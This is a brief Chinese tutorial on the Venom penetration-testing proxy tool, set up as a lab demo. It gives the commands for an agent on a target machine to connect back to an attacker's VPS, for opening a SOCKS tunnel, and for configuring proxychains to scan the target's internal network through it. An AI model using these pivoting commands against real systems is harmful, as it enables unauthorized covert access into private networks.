1 Venom介绍 Venom是一款为渗透测试人员设计的使用Go开发的多级代理工具。 Venom可将多个节点进行连接,然后以节点为跳板,构建多级代理。 渗透测试人员可以使用Venom轻松地将网络流量代理到多层内网,并轻松地管理代理节点。 项目地址:https://github.com/Dliv3/Venom2 使用命令admin监听端口,agent发起连接:./admin_linux_x64 -lport 9999 # 攻击机开启监听./agent_linux_x64 -rhost 192.168.1.100 -rport 9999 # 目标机发起连接agent监听端口,admin发起连接:./agent_linux_x64 -lport 8888./admin_linux_x64 -rhost 192.168.1.100 -rport 88883 实例演示(1)使用腾讯云的VPS模拟攻击机,开启管理端监听,监听端口10002。./admin_linux_x64 -lport 10002(2)使用Kali模拟目标机,使用客户端连接攻击机的管理端,端口也是10002。chmod u+x agent_linux_x64./agent_linux_x64 -rhost VPS的IP -rport 10002(3)攻击机成功收到连接请求,show查看当前节点情况。(4)goto进入节点1,开启socks监听,监听10003端口。goto 1socks 10003(5)这时代理隧道就算弄好了,只要我们把本机的代理设置为攻击机VPS的10003端口,这样流量就走的是目标机Kali的流量了。(6)也可以在攻击机VPS上,使用proxychains扫描探测目标机Kali的内网段。修改proxychains配置文件:echo "socks5 VPS的IP 10003" >> /etc/proxychains.conf4 参考文章https://blog.csdn.net/weixin_45859850/article/details/119813079